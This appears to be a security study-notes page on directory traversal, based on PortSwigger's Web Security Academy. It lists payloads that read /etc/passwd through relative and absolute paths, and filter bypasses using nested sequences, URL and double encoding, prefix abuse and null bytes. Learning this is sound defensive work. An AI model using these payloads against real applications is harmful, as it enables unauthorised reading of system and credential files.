Directory traversal

A directory traversal attack exploits insufficient security validation or sanitization of user-supplied file names, such that characters representing "traverse to parent directory" are passed through to the operating system's file system API.
-- Wikipedia

PortSwigger - Web Security Academy - Directory traversal

Attacks

Traversal sequence (dot dot slash)

For each ../ you step up one directory. Just repeat this until you are in the root directory and then build up the path to the desired file from there.

../../../etc/passwd

Absolute path

Sometimes you can just supply an absolute path.

/etc/passwd

Bypass filters

Nested traversal sequences

When the traversal seqence is only stripped once and not recursively, you can use nested sequences, so that after stripping the inner one, there will still remain a traversal sequence, so ....// becomes ../.

....//....//....//etc/passwd

URL encoding

Single URL encoding

%2e%2e%2f

Double URL encoding (the %-char is also encoding, as %25)

%252e%252e%252f

Non-standard encodings

..%c0%af
..%ef%bc%8f

Mandatory prefix

If the app checks for a specific prefix, you may still be able to add traversal sequences to the file path.

/var/www/images/../../../etc/passwd

Null byte termination

E.g. if the app checks for certain file extensions, you may be able to bypass the filter, by supplying a null byte %00 and therefore termine the string early.

../../../etc/passwd%00.jpg

PreviousFile inclusions (LFI, RFI)NextCross site request forgery (CSRF)

Last updated 3 years ago

hashtagAttacks

hashtagTraversal sequence (dot dot slash)

hashtagAbsolute path

hashtagBypass filters

hashtagNested traversal sequences

hashtagURL encoding

hashtagMandatory prefix

hashtagNull byte termination